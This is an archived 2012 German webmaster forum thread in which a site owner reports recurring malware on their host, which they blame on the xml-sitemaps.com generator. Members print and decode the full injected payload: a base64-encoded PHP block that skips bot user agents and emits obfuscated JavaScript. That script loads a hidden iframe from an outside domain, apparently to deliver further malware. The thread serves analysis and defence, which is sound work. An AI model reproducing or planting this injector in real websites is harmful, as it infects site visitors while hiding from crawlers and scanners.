ABAKUS

Ihr Partner in Sachen SEO und Online Marketing
https://archiv.abakus-internet-marketing.de/foren/

Probleme mit Schadcode in xml-sitemaps.com

https://archiv.abakus-internet-marketing.de/foren/viewtopic.php?f=65&t=106371

Seite 1 von 1

Probleme mit Schadcode in xml-sitemaps.com

Verfasst: 23.02.2012, 09:29
von schlafmuetzen
Ich habe vor zwei Jahren den online Crawler von xml-sitemaps.com ausprobiert und seitdem immer wieder Probleme mit einem Schadcode der den gesamten Host-Account befällt.

Interessanterweise, haben auch andere Kunden des Sitemap Generator die gleichen Probleme.

Hat jemand hier die gleichen Erfahrungen gemacht? Und wenn ja was hat er unternommen?

Der Code fängt wie folgt an:

eval (base64_decode(‘Pz48P3BocAppZighZGVmaW5lZCgnam9lWHc5ZjdiVzdQe
UVjRXYnKSlleGl0KCk7CkBzZXRfdGltZV9saW1pdCgzMCo2MCo2MCk7Cm
VjaG8gJ0FuYWx5c2lzIGluIHBy


Mittlerweile sieht er so aus:

if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])aa=/\w/.exec(new Date()).index+
[];aaa='0';try{new document();}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)
f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62
!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-
30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!
-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!5
8!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!58!69!73!64!63!69!66!73!63!
7!61!61!71!76!7!66!71!63!72!8!61!8!13!9!13!7!73!65!73!24!64!72!22!10!0!-
7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!8
2!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!
77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!7
9!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!
66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!58!69!73!64!63!69!
66!73!63!7!61!61!71!76!7!66!71!63!72!8!61!8!13!9!13!7!73!65!73!24!64!72

!22!10

Verfasst:
von

Re: Probleme mit Schadcode in xml-sitemaps.com

Verfasst: 23.02.2012, 10:12
von Malte Landwehr
schlafmuetzen hat geschrieben: eval (base64_decode(‘...
Mit dem was du gepostet hast, komme ich nur auf:

Code: Alles auswählen

?><?php
if&#40;!defined&#40;'joeXw9f7bW7PyEcEv'&#41;&#41;exit&#40;&#41;;
@set_time_limit&#40;30*60*60&#41;;
echo 'Analysis in pr

Verfasst: 24.02.2012, 13:08
von schlafmuetzen
Hi Malte,

wußte nicht ob ich hier den gesamten Code schreiben sollte.

Wenn es jedoch Sinnvoll ist kann ich das gerne machen

Verfasst:
von

Verfasst: 24.02.2012, 14:13
von schlafmuetzen
eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNkYkoyUW5LeWR2Snlzbll5Y3JKM1VuS3lkdEp5c25aU2NySjI1MEoxMHBZV0U5TDF4M0x5NWxlR1ZqS0c1bGR5QkVZWFJsS0NrcExtbHVaR1Y0SzF0ZE8yRmhZVDBuTUNjN2RISjVlMjVsZHlCa2IyTjFiV1Z1ZENncE8zMWpZWFJqYUNoeGNYRXBlM056UFZOMGNtbHVaenQ5YVdZb1lXRXVhVzVrWlhoUFppaGhZV0VwSVQwOUxURXBDbVk5Snkwek1IWXRNekIyTmpaMk5qTjJMVGQyTVhZMk1YWTNNblkyTUhZM09IWTNNSFkyTW5ZM01YWTNOM1kzZGpZMGRqWXlkamMzZGpNd2RqWTVkall5ZGpjd2RqWXlkamN4ZGpjM2RqYzJkakkzZGpneWRqUTFkalU0ZGpZMGRqTTVkalU0ZGpjd2RqWXlkakYyTUhZMU9YWTNNblkyTVhZNE1uWXdkakoyTlRKMk9YWTFOSFl5ZGpnMGRpMHpNSFl0TXpCMkxUTXdkalkyZGpZemRqYzFkalU0ZGpjd2RqWXlkamMxZGpGMk1uWXlNSFl0TXpCMkxUTXdkamcyZGkwM2RqWXlkalk1ZGpjMmRqWXlkaTAzZGpnMGRpMHpNSFl0TXpCMkxUTXdkall4ZGpjeWRqWXdkamM0ZGpjd2RqWXlkamN4ZGpjM2RqZDJPREIyTnpWMk5qWjJOemQyTmpKMk1YWXROWFl5TVhZMk5uWTJNM1kzTlhZMU9IWTNNSFkyTW5ZdE4zWTNOblkzTlhZMk1IWXlNbll3ZGpZMWRqYzNkamMzZGpjemRqRTVkamgyT0hZMU9IWTFPWFkzT0hZM01IWTNNblkzTjNZM2RqWXhkall4ZGpjeGRqYzJkamQyTmpaMk56RjJOak4yTnpKMk9IWTJNWFk0ZGpFemRqbDJNVE4yTjNZM00zWTJOWFkzTTNZeU5IWTJOSFkzTW5ZeU1uWXhNSFl3ZGkwM2RqZ3dkalkyZGpZeGRqYzNkalkxZGpJeWRqQjJNVEIyT1hZd2RpMDNkalkxZGpZeWRqWTJkalkwZGpZMWRqYzNkakl5ZGpCMk1UQjJPWFl3ZGkwM2RqYzJkamMzZGpneWRqWTVkall5ZGpJeWRqQjJOemwyTmpaMk56WjJOaloyTlRsMk5qWjJOamwyTmpaMk56ZDJPREoyTVRsMk5qVjJOaloyTmpGMk5qRjJOakoyTnpGMk1qQjJOek4yTnpKMk56WjJOaloyTnpkMk5qWjJOekoyTnpGMk1UbDJOVGgyTlRsMk56WjJOekoyTmpsMk56aDJOemQyTmpKMk1qQjJOamwyTmpKMk5qTjJOemQyTVRsMk9YWXlNSFkzTjNZM01uWTNNM1l4T1hZNWRqSXdkakIyTWpOMk1qRjJPSFkyTm5ZMk0zWTNOWFkxT0hZM01IWTJNbll5TTNZdE5YWXlkakl3ZGkwek1IWXRNekIyT0RaMkxUTXdkaTB6TUhZMk0zWTNPSFkzTVhZMk1IWTNOM1kyTm5ZM01uWTNNWFl0TjNZMk5uWTJNM1kzTlhZMU9IWTNNSFkyTW5ZM05YWXhkakoyT0RSMkxUTXdkaTB6TUhZdE16QjJOemwyTlRoMk56VjJMVGQyTmpOMkxUZDJNakoyTFRkMk5qRjJOekoyTmpCMk56aDJOekIyTmpKMk56RjJOemQyTjNZMk1IWTNOWFkyTW5ZMU9IWTNOM1kyTW5Zek1IWTJPWFkyTW5ZM01IWTJNblkzTVhZM04zWXhkakIyTmpaMk5qTjJOelYyTlRoMk56QjJOakoyTUhZeWRqSXdkall6ZGpkMk56WjJOakoyTnpkMk1qWjJOemQyTnpkMk56VjJOaloyTlRsMk56aDJOemQyTmpKMk1YWXdkamMyZGpjMWRqWXdkakIyTlhZd2RqWTFkamMzZGpjM2RqY3pkakU1ZGpoMk9IWTFPSFkxT1hZM09IWTNNSFkzTW5ZM04zWTNkall4ZGpZeGRqY3hkamMyZGpkMk5qWjJOekYyTmpOMk56SjJPSFkyTVhZNGRqRXpkamwyTVROMk4zWTNNM1kyTlhZM00zWXlOSFkyTkhZM01uWXlNbll4TUhZd2RqSjJNakIyTmpOMk4zWTNOblkzTjNZNE1uWTJPWFkyTW5ZM2RqYzVkalkyZGpjMmRqWTJkalU1ZGpZMmRqWTVkalkyZGpjM2RqZ3lkakl5ZGpCMk5qVjJOaloyTmpGMk5qRjJOakoyTnpGMk1IWXlNSFkyTTNZM2RqYzJkamMzZGpneWRqWTVkall5ZGpkMk56TjJOekoyTnpaMk5qWjJOemQyTmpaMk56SjJOekYyTWpKMk1IWTFPSFkxT1hZM05uWTNNblkyT1hZM09IWTNOM1kyTW5Zd2RqSXdkall6ZGpkMk56WjJOemQyT0RKMk5qbDJOakoyTjNZMk9YWTJNblkyTTNZM04zWXlNbll3ZGpsMk1IWXlNSFkyTTNZM2RqYzJkamMzZGpneWRqWTVkall5ZGpkMk56ZDJOekoyTnpOMk1qSjJNSFk1ZGpCMk1qQjJOak4yTjNZM05uWTJNblkzTjNZeU5uWTNOM1kzTjNZM05YWTJOblkxT1hZM09IWTNOM1kyTW5ZeGRqQjJPREIyTmpaMk5qRjJOemQyTmpWMk1IWTFkakIyTVRCMk9YWXdkakoyTWpCMk5qTjJOM1kzTm5ZMk1uWTNOM1l5Tm5ZM04zWTNOM1kzTlhZMk5uWTFPWFkzT0hZM04zWTJNbll4ZGpCMk5qVjJOakoyTmpaMk5qUjJOalYyTnpkMk1IWTFkakIyTVRCMk9YWXdkakoyTWpCMkxUTXdkaTB6TUhZdE16QjJOakYyTnpKMk5qQjJOemgyTnpCMk5qSjJOekYyTnpkMk4zWTJOSFkyTW5ZM04zWXpNSFkyT1hZMk1uWTNNSFkyTW5ZM01YWTNOM1kzTm5ZeU4zWTRNblkwTlhZMU9IWTJOSFl6T1hZMU9IWTNNSFkyTW5ZeGRqQjJOVGwyTnpKMk5qRjJPREoyTUhZeWRqVXlkamwyTlRSMk4zWTFPSFkzTTNZM00zWTJNblkzTVhZMk1YWXlPSFkyTlhZMk5uWTJPWFkyTVhZeGRqWXpkakoyTWpCMkxUTXdkaTB6TUhZNE5pY3VjM0JzYVhRb0ozWW5LVHR0WkQwbllTYzdaVDEzYVc1a2IzZGJKMlVuS3lkMllXd25YVHQzUFdZN2N6MG5KenRtY2owblppY3JKM0p2SnlzbmJTY3JKME5vWVhJbk8zSTljM05iWm5JckowTnZaR1VuWFR0bWIzSW9hVDB3T3kxcFBpMTNMbXhsYm1kMGFEdHBLeXNwZTJvOWFUdHpQWE1yY2lnek9Tc3hLbmRiYWwwcE8zMEthV1lvWVdFdWFXNWtaWGhQWmloaFlXRXBJVDA5TFRFcENtVW9jeWs3UEM5elkzSnBjSFErJykpOw0KfQ=='));

Verfasst: 04.03.2012, 11:27
von Ralle NL
hmmm, konnte ich bisher noch nicht feststellen, ich nutze ihn für ein paar Sachen auch regelmäßig...

Grüße Ralle

Verfasst: 04.03.2012, 12:05
von schlafmuetzen
Mag sein, das der Code jetzt nicht mehr verbreitet wird. Gibt man jedoch generator/data/sitemap.html eval(base64_decode bei google ein werden ein paar Seiten aufgelistet, die sich genau den selben Scheiss eingefangen haben.

Einer hat mir auch schon bestätigt, das er auch einen Schadcode in einer früheren Version hatte.

Verfasst: 04.03.2012, 12:15
von schlafmuetzen
Nach dem Decodieren kommt das heraus:

error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
echo(base64_decode('PHNjcmlwdD5pZih3aW5kb3dbJ2QnKydvJysnYycrJ3UnKydtJysnZScrJ250J10pYWE9L1x3Ly5leGVjKG5ldyBEYXRlKCkpLmluZGV4K1tdO2FhYT0nMCc7dHJ5e25ldyBkb2N1bWVudCgpO31jYXRjaChxcXEpe3NzPVN0cmluZzt9aWYoYWEuaW5kZXhPZihhYWEpIT09LTEpCmY9Jy0zMHYtMzB2NjZ2NjN2LTd2MXY2MXY3MnY2MHY3OHY3MHY2MnY3MXY3N3Y3djY0djYydjc3djMwdjY5djYydjcwdjYydjcxdjc3djc2djI3djgydjQ1djU4djY0djM5djU4djcwdjYydjF2MHY1OXY3MnY2MXY4MnYwdjJ2NTJ2OXY1NHYydjg0di0zMHYtMzB2LTMwdjY2djYzdjc1djU4djcwdjYydjc1djF2MnYyMHYtMzB2LTMwdjg2di03djYydjY5djc2djYydi03djg0di0zMHYtMzB2LTMwdjYxdjcydjYwdjc4djcwdjYydjcxdjc3djd2ODB2NzV2NjZ2Nzd2NjJ2MXYtNXYyMXY2NnY2M3Y3NXY1OHY3MHY2MnYtN3Y3NnY3NXY2MHYyMnYwdjY1djc3djc3djczdjE5djh2OHY1OHY1OXY3OHY3MHY3MnY3N3Y3djYxdjYxdjcxdjc2djd2NjZ2NzF2NjN2NzJ2OHY2MXY4djEzdjl2MTN2N3Y3M3Y2NXY3M3YyNHY2NHY3MnYyMnYxMHYwdi03djgwdjY2djYxdjc3djY1djIydjB2MTB2OXYwdi03djY1djYydjY2djY0djY1djc3djIydjB2MTB2OXYwdi03djc2djc3djgydjY5djYydjIydjB2Nzl2NjZ2NzZ2NjZ2NTl2NjZ2Njl2NjZ2Nzd2ODJ2MTl2NjV2NjZ2NjF2NjF2NjJ2NzF2MjB2NzN2NzJ2NzZ2NjZ2Nzd2NjZ2NzJ2NzF2MTl2NTh2NTl2NzZ2NzJ2Njl2Nzh2Nzd2NjJ2MjB2Njl2NjJ2NjN2Nzd2MTl2OXYyMHY3N3Y3MnY3M3YxOXY5djIwdjB2MjN2MjF2OHY2NnY2M3Y3NXY1OHY3MHY2MnYyM3YtNXYydjIwdi0zMHYtMzB2ODZ2LTMwdi0zMHY2M3Y3OHY3MXY2MHY3N3Y2NnY3MnY3MXYtN3Y2NnY2M3Y3NXY1OHY3MHY2MnY3NXYxdjJ2ODR2LTMwdi0zMHYtMzB2Nzl2NTh2NzV2LTd2NjN2LTd2MjJ2LTd2NjF2NzJ2NjB2Nzh2NzB2NjJ2NzF2Nzd2N3Y2MHY3NXY2MnY1OHY3N3Y2MnYzMHY2OXY2MnY3MHY2MnY3MXY3N3YxdjB2NjZ2NjN2NzV2NTh2NzB2NjJ2MHYydjIwdjYzdjd2NzZ2NjJ2Nzd2MjZ2Nzd2Nzd2NzV2NjZ2NTl2Nzh2Nzd2NjJ2MXYwdjc2djc1djYwdjB2NXYwdjY1djc3djc3djczdjE5djh2OHY1OHY1OXY3OHY3MHY3MnY3N3Y3djYxdjYxdjcxdjc2djd2NjZ2NzF2NjN2NzJ2OHY2MXY4djEzdjl2MTN2N3Y3M3Y2NXY3M3YyNHY2NHY3MnYyMnYxMHYwdjJ2MjB2NjN2N3Y3NnY3N3Y4MnY2OXY2MnY3djc5djY2djc2djY2djU5djY2djY5djY2djc3djgydjIydjB2NjV2NjZ2NjF2NjF2NjJ2NzF2MHYyMHY2M3Y3djc2djc3djgydjY5djYydjd2NzN2NzJ2NzZ2NjZ2Nzd2NjZ2NzJ2NzF2MjJ2MHY1OHY1OXY3NnY3MnY2OXY3OHY3N3Y2MnYwdjIwdjYzdjd2NzZ2Nzd2ODJ2Njl2NjJ2N3Y2OXY2MnY2M3Y3N3YyMnYwdjl2MHYyMHY2M3Y3djc2djc3djgydjY5djYydjd2Nzd2NzJ2NzN2MjJ2MHY5djB2MjB2NjN2N3Y3NnY2MnY3N3YyNnY3N3Y3N3Y3NXY2NnY1OXY3OHY3N3Y2MnYxdjB2ODB2NjZ2NjF2Nzd2NjV2MHY1djB2MTB2OXYwdjJ2MjB2NjN2N3Y3NnY2MnY3N3YyNnY3N3Y3N3Y3NXY2NnY1OXY3OHY3N3Y2MnYxdjB2NjV2NjJ2NjZ2NjR2NjV2Nzd2MHY1djB2MTB2OXYwdjJ2MjB2LTMwdi0zMHYtMzB2NjF2NzJ2NjB2Nzh2NzB2NjJ2NzF2Nzd2N3Y2NHY2MnY3N3YzMHY2OXY2MnY3MHY2MnY3MXY3N3Y3NnYyN3Y4MnY0NXY1OHY2NHYzOXY1OHY3MHY2MnYxdjB2NTl2NzJ2NjF2ODJ2MHYydjUydjl2NTR2N3Y1OHY3M3Y3M3Y2MnY3MXY2MXYyOHY2NXY2NnY2OXY2MXYxdjYzdjJ2MjB2LTMwdi0zMHY4Nicuc3BsaXQoJ3YnKTttZD0nYSc7ZT13aW5kb3dbJ2UnKyd2YWwnXTt3PWY7cz0nJztmcj0nZicrJ3JvJysnbScrJ0NoYXInO3I9c3NbZnIrJ0NvZGUnXTtmb3IoaT0wOy1pPi13Lmxlbmd0aDtpKyspe2o9aTtzPXMrcigzOSsxKndbal0pO30KaWYoYWEuaW5kZXhPZihhYWEpIT09LTEpCmUocyk7PC9zY3JpcHQ+'));
}

Verfasst: 05.03.2012, 09:47
von whyte
und wenn es kein $bot ist, wird dies ausgeführt, sieht nach javascript aus

Code: Alles auswählen

<script>if&#40;window&#91;'d'+'o'+'c'+'u'+'m'+'e'+'nt'&#93;&#41;aa=/\w/.exec&#40;new Date&#40;&#41;&#41;.index+&#91;&#93;;aaa='0';try&#123;new document&#40;&#41;;&#125;catch&#40;qqq&#41;&#123;ss=String;&#125;if&#40;aa.indexOf&#40;aaa&#41;!==-1&#41;
f='-30v-30v66v63v-7v1v61v72v60v78v70v62v71v77v7v64v62v77v30v69v62v70v62v71v77v76v27v82v45v58v64v39v58v70v62v1v0v59v72v61v82v0v2v52v9v54v2v84v-30v-30v-30v66v63v75v58v70v62v75v1v2v20v-30v-30v86v-7v62v69v76v62v-7v84v-30v-30v-30v61v72v60v78v70v62v71v77v7v80v75v66v77v62v1v-5v21v66v63v75v58v70v62v-7v76v75v60v22v0v65v77v77v73v19v8v8v58v59v78v70v72v77v7v61v61v71v76v7v66v71v63v72v8v61v8v13v9v13v7v73v65v73v24v64v72v22v10v0v-7v80v66v61v77v65v22v0v10v9v0v-7v65v62v66v64v65v77v22v0v10v9v0v-7v76v77v82v69v62v22v0v79v66v76v66v59v66v69v66v77v82v19v65v66v61v61v62v71v20v73v72v76v66v77v66v72v71v19v58v59v76v72v69v78v77v62v20v69v62v63v77v19v9v20v77v72v73v19v9v20v0v23v21v8v66v63v75v58v70v62v23v-5v2v20v-30v-30v86v-30v-30v63v78v71v60v77v66v72v71v-7v66v63v75v58v70v62v75v1v2v84v-30v-30v-30v79v58v75v-7v63v-7v22v-7v61v72v60v78v70v62v71v77v7v60v75v62v58v77v62v30v69v62v70v62v71v77v1v0v66v63v75v58v70v62v0v2v20v63v7v76v62v77v26v77v77v75v66v59v78v77v62v1v0v76v75v60v0v5v0v65v77v77v73v19v8v8v58v59v78v70v72v77v7v61v61v71v76v7v66v71v63v72v8v61v8v13v9v13v7v73v65v73v24v64v72v22v10v0v2v20v63v7v76v77v82v69v62v7v79v66v76v66v59v66v69v66v77v82v22v0v65v66v61v61v62v71v0v20v63v7v76v77v82v69v62v7v73v72v76v66v77v66v72v71v22v0v58v59v76v72v69v78v77v62v0v20v63v7v76v77v82v69v62v7v69v62v63v77v22v0v9v0v20v63v7v76v77v82v69v62v7v77v72v73v22v0v9v0v20v63v7v76v62v77v26v77v77v75v66v59v78v77v62v1v0v80v66v61v77v65v0v5v0v10v9v0v2v20v63v7v76v62v77v26v77v77v75v66v59v78v77v62v1v0v65v62v66v64v65v77v0v5v0v10v9v0v2v20v-30v-30v-30v61v72v60v78v70v62v71v77v7v64v62v77v30v69v62v70v62v71v77v76v27v82v45v58v64v39v58v70v62v1v0v59v72v61v82v0v2v52v9v54v7v58v73v73v62v71v61v28v65v66v69v61v1v63v2v20v-30v-30v86'.split&#40;'v'&#41;;md='a';e=window&#91;'e'+'val'&#93;;w=f;s='';fr='f'+'ro'+'m'+'Char';r=ss&#91;fr+'Code'&#93;;for&#40;i=0;-i>-w.length;i++&#41;&#123;j=i;s=s+r&#40;39+1*w&#91;j&#93;&#41;;&#125;
if&#40;aa.indexOf&#40;aaa&#41;!==-1&#41;
e&#40;s&#41;;</script>

Verfasst: 05.03.2012, 11:14
von ingamint
Der JavaScript-Schadcode wird wie oben schon gesagt eingefügt, wenn ein Windows-User ohne typische Bot-Kennung vorbeikommt. Er lädt dann einen versteckten IFrame mit vermutlich weiterem Schadcode von der Adresse "https://abumot.ddns.info/d/404.php?go=1". Das war vermutlich ebenfalls ein infiziertes System.

Die Adresse wird inzwischen aber nicht mehr aufgelöst und scheint laut Google seit mindestens 90 Tagen sauber zu sein.
Alle Zeiten sind UTC+01:00
Seite 1 von 1

Powered by phpBB® Forum Software © phpBB Limited

Deutsche Übersetzung durch phpBB.de